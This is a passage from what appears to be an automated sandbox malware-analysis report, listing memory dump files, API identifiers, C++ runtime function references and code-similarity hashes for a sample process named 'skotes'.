                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AdjustPointer
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1740715915-0
                                                                                                                                            • Opcode ID: abb8b2bb6e6fe9a4147c9121e3ed9d02bd4ac71f7f26cbca327d680741b70392
                                                                                                                                            • Instruction ID: a7e5986c668ac3a84bb97d1485a6f2803ec95bb3cc07cd74bac2a8c1fd07c935
                                                                                                                                            • Opcode Fuzzy Hash: abb8b2bb6e6fe9a4147c9121e3ed9d02bd4ac71f7f26cbca327d680741b70392
                                                                                                                                            • Instruction Fuzzy Hash: 0951E572D01A0AAFDB28AFA4D941BBAB7B4EF14350F144229FB0587291E731ED40C794
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EqualOffsetTypeids
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1707706676-0
                                                                                                                                            • Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                            • Instruction ID: f7a42b12ae5b6c3147737fa1633b9e300b7cee653ca22ddcd0e208a4d164cfcd
                                                                                                                                            • Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
                                                                                                                                            • Instruction Fuzzy Hash: 4A517839A0420D9FDF15CFA8C5806BFBBF5EF19354F14449AEA50A7351D732AA05CB90
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3264154886-0
                                                                                                                                            • Opcode ID: a6d2c5564a75a57a8b198a855670f653fcdec9dadfa2540baf6b31b397606d49
                                                                                                                                            • Instruction ID: ade826da30a470ccdb101e8e8bf37a5cc7a5bb48364986230361673ed5e50e1d
                                                                                                                                            • Opcode Fuzzy Hash: a6d2c5564a75a57a8b198a855670f653fcdec9dadfa2540baf6b31b397606d49
                                                                                                                                            • Instruction Fuzzy Hash: 2941D2B19002059FDB20DF64CA44B5AB7F8FF14320F10852EE816D7750EB35EA15CB91
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00AEDB64
                                                                                                                                              • Part of subcall function 00AE8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00AE8F50
                                                                                                                                            • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00AEDBC3
                                                                                                                                            • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00AEDBE9
                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 00AEDC56
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885873256.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885928333.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885992640.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886053698.0000000000D58000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886119416.0000000000D60000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886192985.0000000000D71000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886244350.0000000000D72000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886312925.0000000000D7D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D7E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886382645.0000000000D9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886502387.0000000000DCD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886552614.0000000000DCE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886584657.0000000000DCF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886645890.0000000000DD5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886672302.0000000000DD7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886705325.0000000000DE4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2886743978.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_ac0000_skotes.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1091748018-0
                                                                                                                                            • Opcode ID: 805eed6eb74f033eecd949cb5ded73ce0273ff89084911c3d1d43cb927ba640f
                                                                                                                                            • Instruction ID: 59653921e0eb8fc9690cc6930f34de3681477fea8019fa50a542cfb0a02c0a37
                                                                                                                                            • Opcode Fuzzy Hash: 805eed6eb74f033eecd949cb5ded73ce0273ff89084911c3d1d43cb927ba640f
                                                                                                                                            • Instruction Fuzzy Hash: 57412570600254ABCF19EB25C986BBEBB79AF84750F14809DE5069B3C2CFB0AD45C7D0
                                                                                                                                            APIs
                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 00AE56F2
                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 00AE5726
                                                                                                                                            • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 00AE578B
                                                                                                                                            • SafeRWList.LIBCONCRT ref: 00AE579A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.2883431001.0000000000AC1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                            • Associated: 00000006.00000002.2883361037.0000000000AC0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883431001.0000000000B22000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883666463.0000000000B29000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883727805.0000000000B2B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883793902.0000000000B35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883845805.0000000000B36000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2883909001.0000000000B37000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884271037.0000000000C98000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884331469.0000000000C9B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CB0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884389885.0000000000CBE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884528151.0000000000CC3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884599549.0000000000CC4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884663901.0000000000CC6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884732748.0000000000CC7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884811901.0000000000CC8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884884192.0000000000CC9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2884989302.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885067265.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885145077.0000000000CF1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885227523.0000000000D04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885306041.0000000000D1C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885368995.0000000000D21000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885429506.0000000000D22000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885497273.0000000000D25000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885572898.0000000000D2E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885645797.0000000000D34000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885714004.0000000000D35000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885779635.0000000000D37000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 00000006.00000002.2885814983.0000000000D4F000.00000080.00000001.01000000.00000007.sdmpDownload File
